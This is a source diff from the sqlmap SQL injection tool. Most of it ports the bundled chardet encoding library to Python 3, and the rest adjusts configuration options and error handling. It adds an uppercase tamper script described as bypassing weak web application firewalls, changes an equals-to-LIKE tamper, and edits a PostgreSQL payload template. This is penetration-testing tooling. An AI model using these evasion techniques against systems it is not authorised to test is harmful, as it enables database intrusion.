infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(column)
logger.info("%s%s%s" % (infoMsg, infoMsgTbl, infoMsgDb))
@ -479,7 +479,7 @@ class Search:
if not isNumPosStrValue(count):
warnMsg = "no databases have tables containing column"
if colConsider == "1":
warnMsg += "s like"
warnMsg += "s LIKE"
warnMsg += " '%s'" % unsafeSQLIdentificatorNaming(column)
logger.warn("%s%s" % (warnMsg, infoMsgTbl))
@ -519,7 +519,7 @@ class Search:
infoMsg = "fetching number of tables containing column"
if colConsider == "1":
infoMsg += "s like"
infoMsg += "s LIKE"
infoMsg += " '%s' in database '%s'" % (unsafeSQLIdentificatorNaming(column), unsafeSQLIdentificatorNaming(db))
logger.info(infoMsg)
@ -533,7 +533,7 @@ class Search:
if not isNumPosStrValue(count):
warnMsg = "no tables contain column"
if colConsider == "1":
warnMsg += "s like"
warnMsg += "s LIKE"
warnMsg += " '%s' " % unsafeSQLIdentificatorNaming(column)
warnMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(db)
logger.warn(warnMsg)

View File

@ -1,4 +1,5 @@
DROP TABLE IF EXISTS %RANDSTR1%;
# https://wiki.postgresql.org/wiki/CREATE_OR_REPLACE_LANGUAGE <- if "CREATE LANGUAGE plpgsql" is required
CREATE TABLE %RANDSTR1%(%RANDSTR2% text);
CREATE OR REPLACE FUNCTION %RANDSTR3%()
RETURNS VOID AS $$

View File

@ -93,10 +93,10 @@ authType =
# Syntax: username:password
authCred =
# HTTP Authentication PEM private key. Useful only if the target URL requires
# HTTP Authentication PEM private/cert key file. Useful only if the target URL requires
# PKI authentication and you have such data.
# Syntax: key_file
authPrivate =
authFile =
# Use a proxy to connect to the target URL.
# Syntax: (http|https|socks4|socks5)://address:port
@ -708,6 +708,9 @@ scope =
# Select tests by payloads and/or titles (e.g. ROW)
testFilter =
# Skip tests by payloads and/or titles (e.g. BENCHMARK)
testSkip =
# Update sqlmap.
# Valid: True or False
updateAll = False
@ -750,6 +753,10 @@ googlePage = 1
# Valid: True or False
identifyWaf = False
# Skip heuristic detection of WAF/IPS/IDS protection.
# Valid: True or False
skipWaf = False
# Imitate smartphone through HTTP User-Agent header.
# Valid: True or False
mobile = False

View File

@ -25,6 +25,7 @@ from lib.controller.controller import start
from lib.core.common import banner
from lib.core.common import createGithubIssue
from lib.core.common import dataToStdout
from lib.core.common import getSafeExString
from lib.core.common import getUnicode
from lib.core.common import maskSensitiveData
from lib.core.common import setPaths
@ -76,7 +77,7 @@ def main():
errMsg = "your system does not properly handle non-ASCII paths. "
errMsg += "Please move the sqlmap's directory to the other location"
logger.error(errMsg)
exit()
raise SystemExit
setPaths()
@ -119,9 +120,9 @@ def main():
cmdLineOptions.sqlmapShell = False
except SqlmapBaseException as ex:
errMsg = getUnicode(ex.message)
errMsg = getSafeExString(ex)
logger.critical(errMsg)
sys.exit(1)
raise SystemExit
except KeyboardInterrupt:
print
@ -141,6 +142,11 @@ def main():
errMsg = unhandledExceptionMessage()
excMsg = traceback.format_exc()
if "No space left" in excMsg:
errMsg = "no space left on output device"
logger.error(errMsg)
raise SystemExit
for match in re.finditer(r'File "(.+?)", line', excMsg):
file_ = match.group(1)
file_ = os.path.relpath(file_, os.path.dirname(__file__))

View File

@ -35,15 +35,9 @@ def tamper(payload, **kwargs):
'SELECT * FROM users WHERE id LIKE 1'
"""
def process(match):
word = match.group()
word = "%sLIKE%s" % (" " if word[0] != " " else "", " " if word[-1] != " " else "")
return word
retVal = payload
if payload:
retVal = re.sub(r"\s*=\s*", lambda match: process(match), retVal)
retVal = re.sub(r"\s*=\s*", " LIKE ", retVal)
return retVal

View File

@ -19,7 +19,7 @@ def tamper(payload, **kwargs):
Replaces AND and OR logical operators with their symbolic counterparts (&& and ||)
>>> tamper("1 AND '1'='1")
'1 && '1'='1'
"1 %26%26 '1'='1"
"""
retVal = payload

46
tamper/uppercase.py Normal file
View File

@ -0,0 +1,46 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
import re
from lib.core.data import kb
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.NORMAL
def dependencies():
pass
def tamper(payload, **kwargs):
"""
Replaces each keyword character with upper case value
Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
Notes:
* Useful to bypass very weak and bespoke web application firewalls
that has poorly written permissive regular expressions
* This tamper script should work against all (?) databases
>>> tamper('insert')
'INSERT'
"""
retVal = payload
if payload:
for match in re.finditer(r"[A-Za-z_]+", retVal):
word = match.group()
if word.upper() in kb.keywords:
retVal = retVal.replace(word, word.upper())
return retVal

View File

@ -3,22 +3,28 @@
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
__version__ = "2.0.1"
__version__ = "2.3.0"
from sys import version_info
def detect(aBuf):
import universaldetector
if ((version_info < (3, 0) and isinstance(aBuf, unicode)) or
(version_info >= (3, 0) and not isinstance(aBuf, bytes))):
raise ValueError('Expected a bytes object, not a unicode object')
from . import universaldetector
u = universaldetector.UniversalDetector()
u.reset()
u.feed(aBuf)

View File

@ -1,11 +1,11 @@
######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Communicator client code.
#
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
@ -13,12 +13,12 @@
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
@ -26,18 +26,18 @@
######################### END LICENSE BLOCK #########################
# Big5 frequency table
# by Taiwan's Mandarin Promotion Council
# by Taiwan's Mandarin Promotion Council
# <http://www.edu.tw:81/mandr/>
#
#
# 128 --> 0.42261
# 256 --> 0.57851
# 512 --> 0.74851
# 1024 --> 0.89384
# 2048 --> 0.97583
#
#
# Ideal Distribution Ratio = 0.74851/(1-0.74851) =2.98
# Random Distribution Ration = 512/(5401-512)=0.105
#
#
# Typical Distribution Ratio about 25% of Ideal one, still much higher than RDR
BIG5_TYPICAL_DISTRIBUTION_RATIO = 0.75
@ -45,7 +45,7 @@ BIG5_TYPICAL_DISTRIBUTION_RATIO = 0.75
#Char to FreqOrder table
BIG5_TABLE_SIZE = 5376
Big5CharToFreqOrder = ( \
Big5CharToFreqOrder = (
1,1801,1506, 255,1431, 198, 9, 82, 6,5008, 177, 202,3681,1256,2821, 110, # 16
3814, 33,3274, 261, 76, 44,2114, 16,2946,2187,1176, 659,3971, 26,3451,2653, # 32
1198,3972,3350,4202, 410,2215, 302, 590, 361,1964, 8, 204, 58,4510,5009,1932, # 48
@ -921,3 +921,5 @@ Big5CharToFreqOrder = ( \
13936,13937,13938,13939,13940,13941,13942,13943,13944,13945,13946,13947,13948,13949,13950,13951, #13952
13952,13953,13954,13955,13956,13957,13958,13959,13960,13961,13962,13963,13964,13965,13966,13967, #13968
13968,13969,13970,13971,13972) #13973
# flake8: noqa

View File

@ -1,11 +1,11 @@
######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Communicator client code.
#
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
@ -13,22 +13,23 @@
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
from mbcharsetprober import MultiByteCharSetProber
from codingstatemachine import CodingStateMachine
from chardistribution import Big5DistributionAnalysis
from mbcssm import Big5SMModel
from .mbcharsetprober import MultiByteCharSetProber
from .codingstatemachine import CodingStateMachine
from .chardistribution import Big5DistributionAnalysis
from .mbcssm import Big5SMModel
class Big5Prober(MultiByteCharSetProber):
def __init__(self):

80
thirdparty/chardet/chardetect.py vendored Normal file
View File

@ -0,0 +1,80 @@
#!/usr/bin/env python
"""
Script which takes one or more file paths and reports on their detected
encodings
Example::
% chardetect somefile someotherfile
somefile: windows-1252 with confidence 0.5
someotherfile: ascii with confidence 1.0
If no paths are provided, it takes its input from stdin.
"""
from __future__ import absolute_import, print_function, unicode_literals
import argparse
import sys
from io import open
from chardet import __version__
from chardet.universaldetector import UniversalDetector
def description_of(lines, name='stdin'):
"""
Return a string describing the probable encoding of a file or
list of strings.
:param lines: The lines to get the encoding of.
:type lines: Iterable of bytes
:param name: Name of file or collection of lines
:type name: str
"""
u = UniversalDetector()
for line in lines:
u.feed(line)
u.close()
result = u.result
if result['encoding']:
return '{0}: {1} with confidence {2}'.format(name, result['encoding'],
result['confidence'])
else:
return '{0}: no result'.format(name)
def main(argv=None):
'''
Handles command line arguments and gets things started.
:param argv: List of arguments, as if specified on the command-line.
If None, ``sys.argv[1:]`` is used instead.
:type argv: list of str
'''
# Get command line arguments
parser = argparse.ArgumentParser(
description="Takes one or more file paths and reports their detected \
encodings",
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
conflict_handler='resolve')
parser.add_argument('input',
help='File whose encoding we would like to determine.',
type=argparse.FileType('rb'), nargs='*',
default=[sys.stdin])
parser.add_argument('--version', action='version',
version='%(prog)s {0}'.format(__version__))
args = parser.parse_args(argv)
for f in args.input:
if f.isatty():
print("You are running chardetect interactively. Press " +
"CTRL-D twice at the start of a blank line to signal the " +
"end of your input. If you want help, run chardetect " +
"--help\n", file=sys.stderr)
print(description_of(f, f.name))
if __name__ == '__main__':
main()

View File

@ -1,11 +1,11 @@
######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Communicator client code.
#
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
@ -13,47 +13,63 @@
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
import constants
from euctwfreq import EUCTWCharToFreqOrder, EUCTW_TABLE_SIZE, EUCTW_TYPICAL_DISTRIBUTION_RATIO
from euckrfreq import EUCKRCharToFreqOrder, EUCKR_TABLE_SIZE, EUCKR_TYPICAL_DISTRIBUTION_RATIO
from gb2312freq import GB2312CharToFreqOrder, GB2312_TABLE_SIZE, GB2312_TYPICAL_DISTRIBUTION_RATIO
from big5freq import Big5CharToFreqOrder, BIG5_TABLE_SIZE, BIG5_TYPICAL_DISTRIBUTION_RATIO
from jisfreq import JISCharToFreqOrder, JIS_TABLE_SIZE, JIS_TYPICAL_DISTRIBUTION_RATIO
from .euctwfreq import (EUCTWCharToFreqOrder, EUCTW_TABLE_SIZE,
EUCTW_TYPICAL_DISTRIBUTION_RATIO)
from .euckrfreq import (EUCKRCharToFreqOrder, EUCKR_TABLE_SIZE,
EUCKR_TYPICAL_DISTRIBUTION_RATIO)
from .gb2312freq import (GB2312CharToFreqOrder, GB2312_TABLE_SIZE,
GB2312_TYPICAL_DISTRIBUTION_RATIO)
from .big5freq import (Big5CharToFreqOrder, BIG5_TABLE_SIZE,
BIG5_TYPICAL_DISTRIBUTION_RATIO)
from .jisfreq import (JISCharToFreqOrder, JIS_TABLE_SIZE,
JIS_TYPICAL_DISTRIBUTION_RATIO)
from .compat import wrap_ord
ENOUGH_DATA_THRESHOLD = 1024
SURE_YES = 0.99
SURE_NO = 0.01
MINIMUM_DATA_THRESHOLD = 3
class CharDistributionAnalysis:
def __init__(self):
self._mCharToFreqOrder = None # Mapping table to get frequency order from char order (get from GetOrder())
self._mTableSize = None # Size of above table
self._mTypicalDistributionRatio = None # This is a constant value which varies from language to language, used in calculating confidence. See http://www.mozilla.org/projects/intl/UniversalCharsetDetection.html for further detail.
# Mapping table to get frequency order from char order (get from
# GetOrder())
self._mCharToFreqOrder = None
self._mTableSize = None # Size of above table
# This is a constant value which varies from language to language,
# used in calculating confidence. See
# http://www.mozilla.org/projects/intl/UniversalCharsetDetection.html
# for further detail.
self._mTypicalDistributionRatio = None
self.reset()
def reset(self):
"""reset analyser, clear any state"""
self._mDone = constants.False # If this flag is set to constants.True, detection is done and conclusion has been made
self._mTotalChars = 0 # Total characters encountered
self._mFreqChars = 0 # The number of characters whose frequency order is less than 512
# If this flag is set to True, detection is done and conclusion has
# been made
self._mDone = False
self._mTotalChars = 0 # Total characters encountered
# The number of characters whose frequency order is less than 512
self._mFreqChars = 0
def feed(self, aStr, aCharLen):
def feed(self, aBuf, aCharLen):
"""feed a character with known length"""
if aCharLen == 2:
# we only care about 2-bytes character in our distribution analysis
order = self.get_order(aStr)
order = self.get_order(aBuf)
else:
order = -1
if order >= 0:
@ -65,12 +81,14 @@ class CharDistributionAnalysis:
def get_confidence(self):
"""return confidence based on existing data"""
# if we didn't receive any character in our consideration range, return negative answer
if self._mTotalChars <= 0:
# if we didn't receive any character in our consideration range,
# return negative answer
if self._mTotalChars <= 0 or self._mFreqChars <= MINIMUM_DATA_THRESHOLD:
return SURE_NO
if self._mTotalChars != self._mFreqChars:
r = self._mFreqChars / ((self._mTotalChars - self._mFreqChars) * self._mTypicalDistributionRatio)
r = (self._mFreqChars / ((self._mTotalChars - self._mFreqChars)
* self._mTypicalDistributionRatio))
if r < SURE_YES:
return r
@ -78,16 +96,18 @@ class CharDistributionAnalysis:
return SURE_YES
def got_enough_data(self):
# It is not necessary to receive all data to draw conclusion. For charset detection,
# certain amount of data is enough
# It is not necessary to receive all data to draw conclusion.
# For charset detection, certain amount of data is enough
return self._mTotalChars > ENOUGH_DATA_THRESHOLD
def get_order(self, aStr):
# We do not handle characters based on the original encoding string, but
# convert this encoding string to a number, here called order.
# This allows multiple encodings of a language to share one frequency table.
def get_order(self, aBuf):
# We do not handle characters based on the original encoding string,
# but convert this encoding string to a number, here called order.
# This allows multiple encodings of a language to share one frequency
# table.
return -1
class EUCTWDistributionAnalysis(CharDistributionAnalysis):
def __init__(self):
CharDistributionAnalysis.__init__(self)
@ -95,16 +115,18 @@ class EUCTWDistributionAnalysis(CharDistributionAnalysis):
self._mTableSize = EUCTW_TABLE_SIZE
self._mTypicalDistributionRatio = EUCTW_TYPICAL_DISTRIBUTION_RATIO
def get_order(self, aStr):
# for euc-TW encoding, we are interested
def get_order(self, aBuf):
# for euc-TW encoding, we are interested
# first byte range: 0xc4 -- 0xfe
# second byte range: 0xa1 -- 0xfe
# no validation needed here. State machine has done that
if aStr[0] >= '\xC4':
return 94 * (ord(aStr[0]) - 0xC4) + ord(aStr[1]) - 0xA1
first_char = wrap_ord(aBuf[0])
if first_char >= 0xC4:
return 94 * (first_char - 0xC4) + wrap_ord(aBuf[1]) - 0xA1
else:
return -1
class EUCKRDistributionAnalysis(CharDistributionAnalysis):
def __init__(self):
CharDistributionAnalysis.__init__(self)
@ -112,15 +134,17 @@ class EUCKRDistributionAnalysis(CharDistributionAnalysis):
self._mTableSize = EUCKR_TABLE_SIZE
self._mTypicalDistributionRatio = EUCKR_TYPICAL_DISTRIBUTION_RATIO
def get_order(self, aStr):
# for euc-KR encoding, we are interested
def get_order(self, aBuf):
# for euc-KR encoding, we are interested
# first byte range: 0xb0 -- 0xfe
# second byte range: 0xa1 -- 0xfe
# no validation needed here. State machine has done that
if aStr[0] >= '\xB0':
return 94 * (ord(aStr[0]) - 0xB0) + ord(aStr[1]) - 0xA1
first_char = wrap_ord(aBuf[0])
if first_char >= 0xB0:
return 94 * (first_char - 0xB0) + wrap_ord(aBuf[1]) - 0xA1
else:
return -1;
return -1
class GB2312DistributionAnalysis(CharDistributionAnalysis):
def __init__(self):
@ -129,15 +153,17 @@ class GB2312DistributionAnalysis(CharDistributionAnalysis):
self._mTableSize = GB2312_TABLE_SIZE
self._mTypicalDistributionRatio = GB2312_TYPICAL_DISTRIBUTION_RATIO
def get_order(self, aStr):
# for GB2312 encoding, we are interested
def get_order(self, aBuf):
# for GB2312 encoding, we are interested
# first byte range: 0xb0 -- 0xfe
# second byte range: 0xa1 -- 0xfe
# no validation needed here. State machine has done that
if (aStr[0] >= '\xB0') and (aStr[1] >= '\xA1'):
return 94 * (ord(aStr[0]) - 0xB0) + ord(aStr[1]) - 0xA1
first_char, second_char = wrap_ord(aBuf[0]), wrap_ord(aBuf[1])
if (first_char >= 0xB0) and (second_char >= 0xA1):
return 94 * (first_char - 0xB0) + second_char - 0xA1
else:
return -1;
return -1
class Big5DistributionAnalysis(CharDistributionAnalysis):
def __init__(self):
@ -146,19 +172,21 @@ class Big5DistributionAnalysis(CharDistributionAnalysis):
self._mTableSize = BIG5_TABLE_SIZE
self._mTypicalDistributionRatio = BIG5_TYPICAL_DISTRIBUTION_RATIO
def get_order(self, aStr):
# for big5 encoding, we are interested
def get_order(self, aBuf):
# for big5 encoding, we are interested
# first byte range: 0xa4 -- 0xfe
# second byte range: 0x40 -- 0x7e , 0xa1 -- 0xfe
# no validation needed here. State machine has done that
if aStr[0] >= '\xA4':
if aStr[1] >= '\xA1':
return 157 * (ord(aStr[0]) - 0xA4) + ord(aStr[1]) - 0xA1 + 63
first_char, second_char = wrap_ord(aBuf[0]), wrap_ord(aBuf[1])
if first_char >= 0xA4:
if second_char >= 0xA1:
return 157 * (first_char - 0xA4) + second_char - 0xA1 + 63
else:
return 157 * (ord(aStr[0]) - 0xA4) + ord(aStr[1]) - 0x40
return 157 * (first_char - 0xA4) + second_char - 0x40
else:
return -1
class SJISDistributionAnalysis(CharDistributionAnalysis):
def __init__(self):
CharDistributionAnalysis.__init__(self)
@ -166,22 +194,24 @@ class SJISDistributionAnalysis(CharDistributionAnalysis):
self._mTableSize = JIS_TABLE_SIZE
self._mTypicalDistributionRatio = JIS_TYPICAL_DISTRIBUTION_RATIO
def get_order(self, aStr):
# for sjis encoding, we are interested
def get_order(self, aBuf):
# for sjis encoding, we are interested
# first byte range: 0x81 -- 0x9f , 0xe0 -- 0xfe
# second byte range: 0x40 -- 0x7e, 0x81 -- oxfe
# no validation needed here. State machine has done that
if (aStr[0] >= '\x81') and (aStr[0] <= '\x9F'):
order = 188 * (ord(aStr[0]) - 0x81)
elif (aStr[0] >= '\xE0') and (aStr[0] <= '\xEF'):
order = 188 * (ord(aStr[0]) - 0xE0 + 31)
first_char, second_char = wrap_ord(aBuf[0]), wrap_ord(aBuf[1])
if (first_char >= 0x81) and (first_char <= 0x9F):
order = 188 * (first_char - 0x81)
elif (first_char >= 0xE0) and (first_char <= 0xEF):
order = 188 * (first_char - 0xE0 + 31)
else:
return -1;
order = order + ord(aStr[1]) - 0x40
if aStr[1] > '\x7F':
order =- 1
return -1
order = order + second_char - 0x40
if second_char > 0x7F:
order = -1
return order
class EUCJPDistributionAnalysis(CharDistributionAnalysis):
def __init__(self):
CharDistributionAnalysis.__init__(self)
@ -189,12 +219,13 @@ class EUCJPDistributionAnalysis(CharDistributionAnalysis):
self._mTableSize = JIS_TABLE_SIZE
self._mTypicalDistributionRatio = JIS_TYPICAL_DISTRIBUTION_RATIO
def get_order(self, aStr):
# for euc-JP encoding, we are interested
def get_order(self, aBuf):
# for euc-JP encoding, we are interested
# first byte range: 0xa0 -- 0xfe
# second byte range: 0xa1 -- 0xfe
# no validation needed here. State machine has done that
if aStr[0] >= '\xA0':
return 94 * (ord(aStr[0]) - 0xA1) + ord(aStr[1]) - 0xa1
char = wrap_ord(aBuf[0])
if char >= 0xA0:
return 94 * (char - 0xA1) + wrap_ord(aBuf[1]) - 0xa1
else:
return -1

View File

@ -25,8 +25,10 @@
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
import constants, sys
from charsetprober import CharSetProber
from . import constants
import sys
from .charsetprober import CharSetProber
class CharSetGroupProber(CharSetProber):
def __init__(self):
@ -41,28 +43,32 @@ class CharSetGroupProber(CharSetProber):
for prober in self._mProbers:
if prober:
prober.reset()
prober.active = constants.True
prober.active = True
self._mActiveNum += 1
self._mBestGuessProber = None
def get_charset_name(self):
if not self._mBestGuessProber:
self.get_confidence()
if not self._mBestGuessProber: return None
if not self._mBestGuessProber:
return None
# self._mBestGuessProber = self._mProbers[0]
return self._mBestGuessProber.get_charset_name()
def feed(self, aBuf):
for prober in self._mProbers:
if not prober: continue
if not prober.active: continue
if not prober:
continue
if not prober.active:
continue
st = prober.feed(aBuf)
if not st: continue
if not st:
continue
if st == constants.eFoundIt:
self._mBestGuessProber = prober
return self.get_state()
elif st == constants.eNotMe:
prober.active = constants.False
prober.active = False
self._mActiveNum -= 1
if self._mActiveNum <= 0:
self._mState = constants.eNotMe
@ -78,18 +84,22 @@ class CharSetGroupProber(CharSetProber):
bestConf = 0.0
self._mBestGuessProber = None
for prober in self._mProbers:
if not prober: continue
if not prober:
continue
if not prober.active:
if constants._debug:
sys.stderr.write(prober.get_charset_name() + ' not active\n')
sys.stderr.write(prober.get_charset_name()
+ ' not active\n')
continue
cf = prober.get_confidence()
if constants._debug:
sys.stderr.write('%s confidence = %s\n' % (prober.get_charset_name(), cf))
sys.stderr.write('%s confidence = %s\n' %
(prober.get_charset_name(), cf))
if bestConf < cf:
bestConf = cf
self._mBestGuessProber = prober
if not self._mBestGuessProber: return 0.0
if not self._mBestGuessProber:
return 0.0
return bestConf
# else:
# self._mBestGuessProber = self._mProbers[0]

View File

@ -1,11 +1,11 @@
######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Universal charset detector code.
#
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 2001
# the Initial Developer. All Rights Reserved.
#
#
# Contributor(s):
# Mark Pilgrim - port to Python
# Shy Shalom - original C code
@ -14,19 +14,21 @@
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
import constants, re
from . import constants
import re
class CharSetProber:
def __init__(self):
@ -48,11 +50,11 @@ class CharSetProber:
return 0.0
def filter_high_bit_only(self, aBuf):
aBuf = re.sub(r'([\x00-\x7F])+', ' ', aBuf)
aBuf = re.sub(b'([\x00-\x7F])+', b' ', aBuf)
return aBuf
def filter_without_english_letters(self, aBuf):
aBuf = re.sub(r'([A-Za-z])+', ' ', aBuf)
aBuf = re.sub(b'([A-Za-z])+', b' ', aBuf)
return aBuf
def filter_with_english_letters(self, aBuf):

View File

@ -13,19 +13,21 @@
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
from constants import eStart, eError, eItsMe
from .constants import eStart
from .compat import wrap_ord
class CodingStateMachine:
def __init__(self, sm):
@ -40,12 +42,15 @@ class CodingStateMachine:
def next_state(self, c):
# for each byte we get its class
# if it is first byte, we also get byte length
byteCls = self._mModel['classTable'][ord(c)]
# PY3K: aBuf is a byte stream, so c is an int, not a byte
byteCls = self._mModel['classTable'][wrap_ord(c)]
if self._mCurrentState == eStart:
self._mCurrentBytePos = 0
self._mCurrentCharLen = self._mModel['charLenTable'][byteCls]
# from byte's class and stateTable, we get its next state
self._mCurrentState = self._mModel['stateTable'][self._mCurrentState * self._mModel['classFactor'] + byteCls]
curr_state = (self._mCurrentState * self._mModel['classFactor']
+ byteCls)
self._mCurrentState = self._mModel['stateTable'][curr_state]
self._mCurrentBytePos += 1
return self._mCurrentState

34
thirdparty/chardet/compat.py vendored Normal file
View File

@ -0,0 +1,34 @@
######################## BEGIN LICENSE BLOCK ########################
# Contributor(s):
# Ian Cordasco - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
import sys
if sys.version_info < (3, 0):
base_str = (str, unicode)
else:
base_str = (bytes, str)
def wrap_ord(a):
if sys.version_info < (3, 0) and isinstance(a, base_str):
return ord(a)
else:
return a

View File

@ -37,11 +37,3 @@ eError = 1
eItsMe = 2
SHORTCUT_THRESHOLD = 0.95
import __builtin__
if not hasattr(__builtin__, 'False'):
False = 0
True = 1
else:
False = __builtin__.False
True = __builtin__.True

44
thirdparty/chardet/cp949prober.py vendored Normal file
View File

@ -0,0 +1,44 @@
######################## BEGIN LICENSE BLOCK ########################
# The Original Code is mozilla.org code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
from .mbcharsetprober import MultiByteCharSetProber
from .codingstatemachine import CodingStateMachine
from .chardistribution import EUCKRDistributionAnalysis
from .mbcssm import CP949SMModel
class CP949Prober(MultiByteCharSetProber):
def __init__(self):
MultiByteCharSetProber.__init__(self)
self._mCodingSM = CodingStateMachine(CP949SMModel)
# NOTE: CP949 is a superset of EUC-KR, so the distribution should be
# not different.
self._mDistributionAnalyzer = EUCKRDistributionAnalysis()
self.reset()
def get_charset_name(self):
return "CP949"

View File

@ -13,39 +13,43 @@
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
import constants, sys
from escsm import HZSMModel, ISO2022CNSMModel, ISO2022JPSMModel, ISO2022KRSMModel
from charsetprober import CharSetProber
from codingstatemachine import CodingStateMachine
from . import constants
from .escsm import (HZSMModel, ISO2022CNSMModel, ISO2022JPSMModel,
ISO2022KRSMModel)
from .charsetprober import CharSetProber
from .codingstatemachine import CodingStateMachine
from .compat import wrap_ord
class EscCharSetProber(CharSetProber):
def __init__(self):
CharSetProber.__init__(self)
self._mCodingSM = [ \
self._mCodingSM = [
CodingStateMachine(HZSMModel),
CodingStateMachine(ISO2022CNSMModel),
CodingStateMachine(ISO2022JPSMModel),
CodingStateMachine(ISO2022KRSMModel)
]
]
self.reset()
def reset(self):
CharSetProber.reset(self)
